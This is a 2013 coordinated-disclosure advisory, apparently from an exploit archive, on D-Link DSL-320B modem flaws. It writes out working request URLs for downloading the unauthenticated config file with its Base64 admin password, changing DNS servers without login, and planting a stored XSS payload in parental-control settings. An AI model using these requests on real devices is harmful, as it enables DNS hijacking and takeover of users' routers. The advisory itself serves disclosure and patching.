D-Link DSL-320B Authentication Bypass / Cross Site Scripting

D-Link DSL-320B Authentication Bypass / Cross Site Scripting: Posted May 6, 2013; Authored by Michael Messner; D-Link DSL-320B suffers from persistent cross site scripting and multiple authentication bypass bypass vulnerabilities.; tags | exploit, vulnerability, xss, bypass; SHA-256 | 39f8eb0877b4a1479fcf473272af42277ef75ed9a0c42219a8756b0d491a8ad4; Download | Favorite | View

D-Link DSL-320B Authentication Bypass / Cross Site Scripting

Device: DSL-320B

Firmware Version: EU_DSL-320B v1.23 date: 28.12.2010

Vendor URL: http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem

============ Vulnerability Overview: ============  

* Access to the Config file without authentication => full authentication bypass possible! :): (1)

192.168.178.111/config.bin

===<snip>====
<sysUserName value="admin"/>
<zipb enable="1"/>
<dns dynamic="disable" primary="1.1.1.1" secondary="2.2.2.3" domain="Home" host="alpha"/>
<sysPassword value="dGVzdA=="/>
===<snip>====

=> sysPassword is Base64 encoded

* Access to the logfile without authentication: (1)
192.168.178.111/status/status_log.sys

* Change the DNS Settings without authentication: (1)
http://192.168.178.111/advanced/adv_dns.xgi?&SET/dns/mode=0&SET/dns/mode/server/primarydns=1.1.1.1&SET/dns/mode/server/secondarydns=2.2.2.2

* Stored XSS within parental control (2):
  
  => Parameter: set/bwlist/entry:1/hostname
  
Request:
http://192.168.178.111/home/home_parent.xgi?&set/bwlist/enable=1&set/bwlist/bw_status=0&set/bwlist/entry:1/bw_flag=0&set/bwlist/entry:1/hostname=%22%3E%3Cimg%20src=%220%22%20onerror=alert(1)%3E&set/bwlist/entry:1/weekday=6&set/bwlist/entry:1/begintime=00:00&set/bwlist/entry:1/endtime=23:59&set/bwlist/entry:1/store=1&set/bwlist/apply=1

Again you are able to place this XSS without authentication. :)

* Login Credentials in HTTP GET are not a good idea => use HTTP Post! (3)
http://192.168.178.111/login.xgi?user=admin&pass=admin1

* Credentials in HTTP GET via password change request are not a good idea => use HTTP Post!: (3)
http://192.168.178.111/tools/tools_admin.xgi?&set/sys/account/user/oldpwd=admin&set/sys/account/user/password=test&CMT=1

============ Solution ============

Update to firmware version 1.25:

(1) - fixed
(2) - not fixed but authentication needed
(3) - not fixed

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de

============ Time Line: ============

17.03.2012 - discovered vulnerabilities
17.03.2013 - informed vendor about the vulnerabilities
25.04.2013 - tested beta version from vendor
30.04.2013 - vendor releases patch
06.05.2013 - public disclosure

===================== Advisory end =====================

Top Authors In Last 30 Days

Red Hat 247 files
indoushka 101 files
Ubuntu 87 files
Gentoo 36 files
Jasper Nota 25 files
Debian 21 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,100)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,775)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,536)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,750)
UNIX (9,437)
UnixWare (187)
Windows (6,674)
Other

D-Link DSL-320B Authentication Bypass / Cross Site Scripting

D-Link DSL-320B Authentication Bypass / Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

D-Link DSL-320B Authentication Bypass / Cross Site Scripting

Share This

D-Link DSL-320B Authentication Bypass / Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems